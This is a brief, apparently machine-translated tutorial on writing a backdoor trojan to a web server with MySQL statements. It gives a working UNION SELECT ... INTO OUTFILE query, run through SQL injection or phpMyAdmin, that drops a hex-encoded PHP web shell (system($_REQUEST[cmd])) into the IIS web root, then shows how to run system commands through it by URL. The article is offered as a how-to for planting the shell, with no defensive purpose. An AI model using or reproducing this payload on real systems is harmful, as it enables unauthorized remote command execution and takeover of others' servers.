The following articles mainly introduce how to use MySQL statements to generate Backdoor trojans. The following describes the main content of this article, if you are interested in using MySQL statements to generate Backdoor trojans, the following articles will be of great significance to you.
- SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,
0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'
The cmd. php file is generated under C:/inetpub/wwwroot/through MySQL injection or running the above statement in phpmyadmin. The content is the original vbb_strikes content, followed:
- 2 3 <?php system($_REQUEST[cmd]);?>
Again Through http://www.xxx.com/cmd.php? Cmd = dir c: \ to execute the system doscommand!
Which sort is what?
It is a hexadecimal encoding. If this method is not used, other encodings may appear in different SQL versions, such as % xx. Which backdoor cannot be executed! If you have other language names, you can enter them in UltraEdit and press the [Ctrl + H] key to connect the hex in it!
The above content is an introduction to the method for generating Backdoor trojans using MySQL statements. I hope you will gain some benefits.